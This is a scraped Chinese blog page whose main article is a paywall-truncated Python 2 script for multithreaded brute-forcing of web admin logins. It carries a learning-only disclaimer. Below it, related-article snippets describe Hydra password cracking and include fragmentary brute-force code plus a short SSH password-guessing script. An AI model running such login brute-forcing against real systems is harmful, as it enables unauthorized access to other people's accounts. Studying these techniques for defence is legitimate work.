python 写的http后台弱口令爆破工具

最新推荐文章于 2024-07-23 11:58:10 发布
最新推荐文章于 2024-07-23 11:58:10 发布
阅读量6.2k 收藏 9
点赞数
分类专栏: Python学习笔记 文章标签: python多线程 webform账户爆破 python 脚本 python 自定义Http数据包 迭代器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l_f0rm4t3d/article/details/17287013
版权
本文介绍了一个使用Python编写的多线程HTTP后台弱口令爆破工具,通过读取用户和密码字典文件进行爆破尝试。代码中包含HTTP连接设置、多线程处理以及结果输出,旨在教育用途,禁止用于非法攻击。
摘要由CSDN通过智能技术生成 
# -*- coding: utf-8 -*-
# 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
import urllib2
import urllib
import httplib
import threading

headers = {"Content-Type":"application/x-www-form-urlencoded",     
           "Connection":"Keep-Alive",
           "Referer":"http://www.xxxxx.com/"};# referer:是代理的访问来源地址
# lock = threading.Lock()
def tryUser(user,password):
    #print user,password
    global headers
    global outFile 
    conn = httplib.HTTPConnection("www.xxxxx.com") # 远程域名
    if len(user) < 3:     # 限制用户名长度,排除字典中的无用数据
        return  # 主动退出线程
    else:
        #lock.acquire()   # 多线程操作文件,提前加锁,用后释放
        #line = inFile.readline()
        
        #userData = line.strip().split(' # ') # strip() 默认去除空白字符包括' ','\t','\n'等
        #loc
最低0.47元/天 解锁文章
1_f0rm4t3d
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
爬虫系列 一次采集.NET WebForm网站的坎坷历程
NET是世界上最好的语言
05-12 564
目录 先准备下一个GET/POST预备使用 登陆 抓取人员信息 采集列表 获取工号 入库 总结 今天接到一个活,需要统计人员的工号信息,由于种种原因不能直接连数据库 [无奈]、[无奈]、[无奈]。采取迂回方案,工具自动登录网站,采集用户信息。 这也不是第一次采集ASP.NET网站,以前采集的时候就知道,这种网站采集比较麻烦,尤其是WebForm的ASP.NET 网站,那叫一个费劲。 喜欢现在流行的Restful模式的网站,数据接口采集那才叫舒服。 闲话少说,开干 工作量不大,HT
python + web操作 爬虫 自动填表单
热门推荐
CloudCver
08-21 1万+
python + web操作 爬虫 自动填表单 Pre install package 安装webdriver库(chorme版本):找到你的版本,下载好放到Google/Chrome/Application文件夹下 http://npm.taobao.org/mirrors/chromedriver/ 安装python selenium库 pip3 install selenium 基本...
kali linux网络安全弱口令爆破常用命令(二)
qq_53058639的博客
07-23 854
KaliLinux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。要尝试破解的目标主机的IP地址或域名。目标主机上服务运行的端口号。目标主机上服务使用的协议,如SSH、FTP等。目标主机上服务的类型,如SSH服务的用户名枚举、密码破解等。指定Hydra使用的攻击方法,如暴力破解、字典攻击等。
爬虫(form表单提交)
weixin_30687587的博客
09-07 1260
import requests import json from lxml import etree # url = "https://m.ctrip.com/restapi/soa2/14666/json/TrainTransferListSearch?_fxpcqlniredt=09031127310306517228" #network中XHR加载出来的网址 hea...
[python爬虫]表单模拟登录(post请求,xpath数据解析,结果输出)
liyunyang2000的博客
06-10 723
表单模拟登录人人网,访问某个人的主页(如包贝尔主页),爬取其个人信息(姓名,代表作),将结果直接打印输出即可。
python 实现简单爆破form表单
weixin_33751566的博客
01-03 211
import httplib,urllibimport stringdef rf(): fp=open('1.txt','r') for i in fp: fp1=open('1.txt','r') for j in fp1: if(conn1(i.rstrip(),j.rstrip())): ...
基于Python的自动扫描内网弱口令
05-09
如果成功,就输出找到的弱口令并断开连接;否则,就输出连接失败的信息。 这个代码可以自动扫描本机所在内网中的所有主机,并测试它们的弱口令。但是需要注意的是,其可能会受到防火墙或其他安全设施的限制,导致...
Python实现FTP弱口令扫描器的方法示例
09-19
在本文中,我们将深入探讨如何使用Python实现一个FTP弱口令扫描器。FTP(File Transfer Protocol)是一种广泛用于在网络上共享和传输文件的协议。FTP服务器是执行FTP协议的计算机,通常运行在端口21(控制端口)和20...
WebCrack:WebCrack是一款web后台弱口令万能密码批量检测工具,在工具中导入后台地址即可进行自动化检测
05-05
WebCrack v(2.1)工具简介WebCrack是一款web后台弱口令/万能密码批量检测工具,在工具中导入后台地址即可进行自动化检测。开发文档更新日志2021/03/15 v(2.1)修复目标为IP时字典生成失败的BUG2021/02/22 v(2.0)代码...
Python的PHPMyAdmin暴力破解工具代码
12-25
/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib....
便签小工具-python
最新发布
08-06
一个可以自己添加工作内容,销毁工作内容的小工具. 依赖包一起打包了.
python3 爬取网页表格实例
07-01
python爬取网页的表格内容, 并存入csv文件, 网页地址:http://app.finance.ifeng.com/data/stock/yjyg.php?symbol=000001
Python网络爬虫系列(三)表单处理
kkbb8811的博客
02-15 1913
import urllib,urllib2 LOGIN_URL = r'http://example.webscraping.com/user/login' LOGIN_EMAIL = 'kkbb8811@qq.com' LOGIN_PASSWORD ='qq123456' data ={'email':LOGIN_EMAIL,'password':LOGIN_PASSWORD} encoded
cookie 和session
pythondafahao的博客
04-01 222
HTTP协议本身是无状态的,怎么保存来过或登陆过网站的信息?所以我们需要在HTTP协议之外通过某种机制来识别用户的身份。于是就有了Session和Cookie。什么是Cookie,什么是Session?会话(Session)跟踪是Web程序中常用的技术,用来跟踪用户的整个会话。常用的会话跟踪技术是Cookie与Session。Cookie通过在客户端记录信息确定用户身份,Session通过在服务器...
python3爬虫学习系列06 -表单交互
besmarterbestronger的博客
08-09 251
文章目录一、登陆表单2. 使用Mechanize模块实现自动化表单处理三、参考文献 之前的博客: 爬虫学习系列02-常见的下载和抽取网页的方法 爬虫学习系列03-下载缓存 爬虫学习系列04 - 并发下载 爬虫学习系列05 - 获取动态内容 本节,将与网页进行交互,根据用户输入返回对应的内容。 发送POST请求提交表单; 使用cookie登陆网站; 用于简化表单提交的高级模块Mechanize。 ...
爬虫(6)-- 表单交互
ouprince
05-18 533
表单 form : <form action="#" enctype="application/x-www-form-urlencoded" method="post"> action 用于设置表单数据的提交地址;enctype 设置数据提交的编码; 输入:<input class="xxx" id="xxx" name="xxx" type="xxx" value=""/&...
web-ctf】ctf-pikachu-暴力破解
一个努力生活的人的博客
06-11 2894
文章目录暴力破解(Brute Force)1.基于表单的暴力破解 burpsuite配置 火狐浏览器需要导入证书 如果无法抓到127.0.0.1的包,可以试试以下操作 暴力破解(Brute Force) 1.基于表单的暴力破解 使用burpsuite工具中的intruder模块进行暴力破解:intruder模块使用教程 先随便输入一个username和password 利用burpsuite进行抓包 将抓到的包导入intruder模块(在空白处右键,选择send to intruder)
Web暴力破解--前端JS表单加密进行爆破
2301_77300311的博客
04-07 600
从前台到后台是一个质的突破,本文主要对很多web 在登陆的过程中会用 js 对密码进行加密传输,梳理了一下web暴力猜解的技巧。常见的js实现加密的方式有:md5、base64、shal,了一个简单的demo作为测试。2、分别选择用户名字典和密码字典,在设置密码字典的时候,选择md5加密方式对密码字段进行加密处理。四种爆破方式:单一字典爆破、多字段相同字典爆破、多字典位置对应爆破、聚合式爆破。最常用的应该是在爆破用户名和密码的时候,使用聚合方式枚举了。0x03 Web暴力猜解。方式二:Python脚本
WebCrack:网站后台弱口令批量检测工具 ——yzddMr6
yzddMr6的博客
11-06 2956
经过这么长时间的测试终于算是可以上线了,篇文章跟大家分享一下自己的开发思路吧 注:本工具借鉴吸收了TideSec的web_pwd_common_crack很多优秀的思路,在此基础上增加了很多拓展功能使其更加强大,在这里给TideSec的大佬点个赞! 前言 在做安全测试的时候,随着资产的增多,经常会遇到需要快速检测大量网站后台弱口令的问题。 然而市面上并没有一个比较好的解决...
python网络口令爆破
04-03
网络口令爆破是指通过暴力破解的方式,尝试所有可能的组合,来获取系统或者应用程序的登录口令,从而实现非法进入系统或者应用程序的行为。下面是一个简单的Python网络口令爆破程序的示例: ```python import socket target_host = "127.0.0.1" target_port = 22 # create a socket object client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connect the client client.connect((target_host,target_port)) # send some data username = "admin" passwords = ["123456", "admin", "password", "root", "123456789", "qwerty", "abc123"] for password in passwords: client.send(username.encode() + b"\r\n") client.send(password.encode() + b"\r\n") response = client.recv(4096).decode() if "Authentication successful" in response: print("[+] Password found: " + password) break # print the response print(response) # close the client client.close() ``` 以上示例程序用Python实现了一个简单的SSH口令爆破工具,通过尝试一系列预定义的密码来猜测登录口令,并输出正确的口令。需要注意的是,这种行为是违法的,只能在合法的授权情况下进行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值